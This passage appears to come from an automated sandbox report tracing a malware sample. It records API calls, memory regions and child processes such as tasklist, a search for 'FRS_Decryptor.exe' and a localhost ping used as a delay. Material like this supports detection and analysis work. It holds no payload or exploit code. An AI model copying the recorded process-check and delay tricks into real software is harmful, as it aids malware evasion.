_FileHandleDst=0) returned 0 [0101.516] _close (_FileHandle=4) returned 0 [0101.516] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0101.959] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x89fd68 | out: lpExitCode=0x89fd68*=0x0) returned 1 [0101.959] CloseHandle (hObject=0x64) returned 1 [0101.959] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0101.962] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x89fd68 | out: lpExitCode=0x89fd68*=0x0) returned 1 [0101.962] CloseHandle (hObject=0x60) returned 1 [0101.962] _get_osfhandle (_FileHandle=1) returned 0x260 [0101.962] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0101.962] _get_osfhandle (_FileHandle=1) returned 0x260 [0101.962] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0101.962] _get_osfhandle (_FileHandle=0) returned 0x24 [0101.962] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0101.963] SetConsoleInputExeNameW () returned 0x1 [0101.963] GetConsoleOutputCP () returned 0x1b5 [0101.963] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0101.963] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.963] exit (_Code=0) Process: id = "95" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x60fcb000" os_pid = "0x474" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x824" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4917 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 4918 start_va = 0xd80000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 4919 start_va = 0xda0000 end_va = 0xda1fff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 4920 start_va = 0xdb0000 end_va = 0xdbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 4921 start_va = 0xdc0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 4922 start_va = 0xe00000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 4923 start_va = 0xe40000 end_va = 0xe43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 4924 start_va = 0xe50000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 4925 start_va = 0xe60000 end_va = 0xe61fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 4926 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4927 start_va = 0x7f200000 end_va = 0x7f222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f200000" filename = "" Region: id = 4928 start_va = 0x7f223000 end_va = 0x7f223fff entry_point = 0x0 region_type = private name = "private_0x000000007f223000" filename = "" Region: id = 4929 start_va = 0x7f224000 end_va = 0x7f224fff entry_point = 0x0 region_type = private name = "private_0x000000007f224000" filename = "" Region: id = 4930 start_va = 0x7f22d000 end_va = 0x7f22ffff entry_point = 0x0 region_type = private name = "private_0x000000007f22d000" filename = "" Region: id = 4931 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4932 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4933 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4934 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4954 start_va = 0x1010000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 4955 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4956 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4957 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4962 start_va = 0xd80000 end_va = 0xd8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 4963 start_va = 0xd90000 end_va = 0xd93fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 4964 start_va = 0xda0000 end_va = 0xda2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 4965 start_va = 0xe70000 end_va = 0xeedfff entry_point = 0xe70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4966 start_va = 0xef0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 4967 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 4968 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 4969 start_va = 0x1020000 end_va = 0x1020fff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 4970 start_va = 0x1030000 end_va = 0x1033fff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 4971 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 4972 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 4973 start_va = 0x1090000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 4974 start_va = 0x10a0000 end_va = 0x1227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 4975 start_va = 0x1230000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 4976 start_va = 0x13c0000 end_va = 0x27bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 4977 start_va = 0x27c0000 end_va = 0x2901fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 4978 start_va = 0x2910000 end_va = 0x2be4fff entry_point = 0x2910000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4979 start_va = 0x2bf0000 end_va = 0x2febfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bf0000" filename = "" Region: id = 4980 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4981 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4982 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 4983 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4984 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4985 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4986 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4987 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4988 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4989 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4990 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4991 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4992 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4993 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4994 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4995 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4996 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4997 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4998 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4999 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5000 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5001 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5002 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5003 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5004 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5005 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5006 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5007 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5008 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5009 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5010 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5011 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5012 start_va = 0x7f100000 end_va = 0x7f1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f100000" filename = "" Region: id = 5013 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5014 start_va = 0x2ff0000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 5015 start_va = 0x3030000 end_va = 0x306ffff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 5016 start_va = 0x3070000 end_va = 0x30affff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 5017 start_va = 0x30b0000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 5018 start_va = 0x30f0000 end_va = 0x312ffff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 5019 start_va = 0x3130000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 5020 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5021 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5022 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5023 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5024 start_va = 0x7f0fd000 end_va = 0x7f0fffff entry_point = 0x0 region_type = private name = "private_0x000000007f0fd000" filename = "" Region: id = 5025 start_va = 0x7f227000 end_va = 0x7f229fff entry_point = 0x0 region_type = private name = "private_0x000000007f227000" filename = "" Region: id = 5026 start_va = 0x7f22a000 end_va = 0x7f22cfff entry_point = 0x0 region_type = private name = "private_0x000000007f22a000" filename = "" Region: id = 5027 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 272 os_tid = 0x830 Thread: id = 274 os_tid = 0xb34 Thread: id = 275 os_tid = 0x96c Thread: id = 276 os_tid = 0xaf8 Process: id = "96" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x12e5a000" os_pid = "0x838" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x824" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4936 start_va = 0x9a0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4937 start_va = 0x9c0000 end_va = 0x9c1fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 4938 start_va = 0x9d0000 end_va = 0x9defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 4939 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 4940 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 4941 start_va = 0xa60000 end_va = 0xa63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 4942 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 4943 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 4944 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4945 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4946 start_va = 0x7f7b0000 end_va = 0x7f7d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7b0000" filename = "" Region: id = 4947 start_va = 0x7f7db000 end_va = 0x7f7dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f7db000" filename = "" Region: id = 4948 start_va = 0x7f7dc000 end_va = 0x7f7dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f7dc000" filename = "" Region: id = 4949 start_va = 0x7f7dd000 end_va = 0x7f7dffff entry_point = 0x0 region_type = private name = "private_0x000000007f7dd000" filename = "" Region: id = 4950 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4951 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4952 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4953 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4958 start_va = 0xbe0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 4959 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4960 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4961 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5028 start_va = 0x9a0000 end_va = 0x9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 5029 start_va = 0x9b0000 end_va = 0x9b3fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 5030 start_va = 0x9c0000 end_va = 0x9c3fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 5031 start_va = 0xa90000 end_va = 0xb0dfff entry_point = 0xa90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5032 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 5033 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 5034 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 5035 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 5036 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5037 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5038 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5039 start_va = 0x7f6b0000 end_va = 0x7f7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6b0000" filename = "" Thread: id = 273 os_tid = 0xb08 Process: id = "97" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0xf17a000" os_pid = "0x37c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5040 start_va = 0x6d0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5041 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5042 start_va = 0x700000 end_va = 0x70efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 5043 start_va = 0x710000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5044 start_va = 0x750000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 5045 start_va = 0x790000 end_va = 0x793fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 5046 start_va = 0x7a0000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 5047 start_va = 0x7b0000 end_va = 0x7b1fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5048 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5049 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5050 start_va = 0x7f0d0000 end_va = 0x7f0f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 5051 start_va = 0x7f0f3000 end_va = 0x7f0f3fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f3000" filename = "" Region: id = 5052 start_va = 0x7f0f5000 end_va = 0x7f0f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f5000" filename = "" Region: id = 5053 start_va = 0x7f0fd000 end_va = 0x7f0fffff entry_point = 0x0 region_type = private name = "private_0x000000007f0fd000" filename = "" Region: id = 5054 start_va = 0x7ffe0000 end_va = 0x7ffeffff 